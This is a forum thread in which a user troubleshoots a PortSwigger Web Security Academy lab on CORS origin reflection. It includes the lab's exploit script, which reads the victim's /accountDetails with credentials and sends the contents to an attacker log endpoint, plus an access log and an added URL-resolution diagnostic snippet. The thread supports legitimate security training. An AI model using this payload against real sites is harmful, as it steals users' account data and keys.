The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


Lab is not solved by its own written solution

Constantine | Last updated: Jan 05, 2023 08:26AM UTC

I tried to solve the lab "CORS vulnerability with basic origin reflection" using the written solution. This is what it ends up showing in the access log: "log?key=%22Resource%20not%20found%20-%20Academy%20Exploit%20Server%22"

Ben, PortSwigger Agent | Last updated: Jan 05, 2023 11:33AM UTC

Hi Constantine, I believe that I have already answered your other forum post about this issue but, for completeness, I asked the following in the other thread: To confirm, what does your HTML script look like (the script that is mentioned in Step 5 of the solution)?

constantine | Last updated: Jan 05, 2023 05:31PM UTC

This is the script I used, thank you:

    <script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','0ae2007b0408d7f9c285b2a700ff007a.web-security-academy.net/accountDetails',true);
    req.withCredentials = true;
    req.send();
    function reqListener() {
        location='/log?key='+this.responseText;
    };
    </script>

Ben, PortSwigger Agent | Last updated: Jan 05, 2023 06:24PM UTC

Hi Constantine,

If you add https:// to the start of your lab ID URL, does this then work for you, i.e.:

    <script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','https://0ae2007b0408d7f9c285b2a700ff007a.web-security-academy.net/accountDetails',true);
    req.withCredentials = true;
    req.send();
    function reqListener() {
        location='/log?key='+this.responseText;
    };
    </script>
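Added example, not part of the original posts or of PortSwigger's written solution: it resolves the string passed to `req.open()` the way a browser does, against the URL of the page running the script, to show why a scheme-less lab address stays on the exploit server's own origin, which is consistent with the "Resource not found - Academy Exploit Server" text reported in the first post. `PAGE_URL`, `LAB_HOST` and `diagnoseXhrTarget` are constructed placeholders and hypothetical names, not values from the thread.

```javascript
// Added example, not code from the thread.
// PAGE_URL and LAB_HOST are constructed placeholders.
const PAGE_URL = 'https://exploit-server.example/exploit/';
const LAB_HOST = 'your-lab-id.web-security-academy.net';

// Resolve rawUrl the way a browser resolves the URL argument of
// XMLHttpRequest.open(): relative to the page that runs the script.
function diagnoseXhrTarget(rawUrl, pageUrl, intendedHost) {
  const page = new URL(pageUrl);
  let target;
  try {
    target = new URL(rawUrl, page);
  } catch (err) {
    return { href: null, crossOrigin: false, reachesIntendedHost: false,
             reason: 'not a parsable URL' };
  }
  // Same rule the URL parser uses: a scheme is letters/digits/+/./- then ':'.
  const hasScheme = /^[a-z][a-z0-9+.-]*:/i.test(rawUrl);
  const schemeRelative = rawUrl.startsWith('//');
  let reason;
  if (hasScheme) reason = 'absolute URL: used as written';
  else if (schemeRelative) reason = 'scheme-relative: inherits the page scheme';
  else reason = 'no scheme: treated as a path on the page origin';
  return {
    href: target.href,
    crossOrigin: target.origin !== page.origin,
    reachesIntendedHost: target.hostname === intendedHost,
    reason,
  };
}

const cases = [
  LAB_HOST + '/accountDetails',              // scheme omitted
  'https://' + LAB_HOST + '/accountDetails', // scheme present
  '//' + LAB_HOST + '/accountDetails',       // scheme-relative
];
for (const raw of cases) {
  console.log(raw, '->', diagnoseXhrTarget(raw, PAGE_URL, LAB_HOST));
}
```
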

constantine | Last updated: Jan 05, 2023 06:50PM UTC

Hello, thanks for the help, but I tried it and it did not work. This is my access log below:

    197.210.227.205 2023-01-05 18:38:07 +0000 "GET / HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
    197.210.227.205 2023-01-05 18:38:07 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
    197.210.55.247 2023-01-05 18:38:52 +0000 "POST / HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
    197.210.226.164 2023-01-05 18:38:52 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
    197.210.226.236 2023-01-05 18:38:55 +0000 "POST / HTTP/1.1" 302 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
    197.210.227.205 2023-01-05 18:38:56 +0000 "GET /deliver-to-victim HTTP/1.1" 302 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
    10.0.4.6 2023-01-05 18:38:56 +0000 "GET /exploit/ HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.124 Safari/537.36"
    197.210.226.164 2023-01-05 18:38:57 +0000 "GET / HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
    197.210.226.164 2023-01-05 18:38:57 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
    197.210.227.205 2023-01-05 18:39:00 +0000 "POST / HTTP/1.1" 302 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
    197.210.226.164 2023-01-05 18:39:00 +0000 "GET /log HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
    197.210.55.247 2023-01-05 18:39:01 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
    197.210.226.236 2023-01-05 18:41:27 +0000 "GET /log HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
    197.210.227.205 2023-01-05 18:41:28 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
    197.210.226.164 2023-01-05 18:41:44 +0000 "GET / HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
    197.210.55.247 2023-01-05 18:41:45 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
    197.210.226.236 2023-01-05 18:41:52 +0000 "POST / HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
    197.210.226.164 2023-01-05 18:41:52 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
    197.210.227.205 2023-01-05 18:42:25 +0000 "GET /exploit HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
    197.210.226.236 2023-01-05 18:42:35 +0000 "GET / HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
    197.210.226.164 2023-01-05 18:42:36 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
    197.210.226.122 2023-01-05 18:42:42 +0000 "POST / HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
    197.210.226.164 2023-01-05 18:42:43 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
    197.210.55.247 2023-01-05 18:42:47 +0000 "POST / HTTP/1.1" 302 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
    197.210.226.122 2023-01-05 18:42:47 +0000 "GET /deliver-to-victim HTTP/1.1" 302 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
    10.0.4.6 2023-01-05 18:42:47 +0000 "GET /exploit/ HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.124 Safari/537.36"
    197.210.226.236 2023-01-05 18:42:48 +0000 "GET / HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
    197.210.226.164 2023-01-05 18:42:49 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
    197.210.226.164 2023-01-05 18:42:52 +0000 "POST / HTTP/1.1" 302 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"

Ben, PortSwigger Agent | Last updated: Jan 06, 2023 08:06AM UTC